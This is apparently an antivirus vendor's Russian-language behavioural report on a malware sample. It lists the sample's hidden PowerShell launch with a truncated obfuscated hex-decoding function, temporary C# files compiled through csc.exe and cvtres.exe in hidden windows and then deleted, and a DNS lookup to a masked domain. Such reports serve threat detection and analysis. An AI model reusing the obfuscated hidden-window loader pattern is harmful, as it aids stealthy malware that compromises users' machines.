Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function cb825 { param($t52f8) $h2b5e = 'x976b76';$a8ee28 = ''; for ($i = 0; $i -lt $t52f8.length; $i+=2) { $s5fa76 = [convert]::ToByte($t52f8.Substring($i, 2), 16); ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\h9e_8p18.0.cs
- %TEMP%\h9e_8p18.cmdline
- %TEMP%\h9e_8p18.out
- %TEMP%\cscd817.tmp
- %TEMP%\resd818.tmp
- %TEMP%\h9e_8p18.dll
Удаляет следующие файлы
- %TEMP%\resd818.tmp
- %TEMP%\cscd817.tmp
- %TEMP%\h9e_8p18.0.cs
- %TEMP%\h9e_8p18.pdb
- %TEMP%\h9e_8p18.cmdline
- %TEMP%\h9e_8p18.dll
- %TEMP%\h9e_8p18.out
Сетевая активность
UDP
- DNS ASK ea###elsum.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\h9e_8p18.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD818.tmp" "%TEMP%\CSCD817.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\h9e_8p18.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD818.tmp" "%TEMP%\CSCD817.tmp"
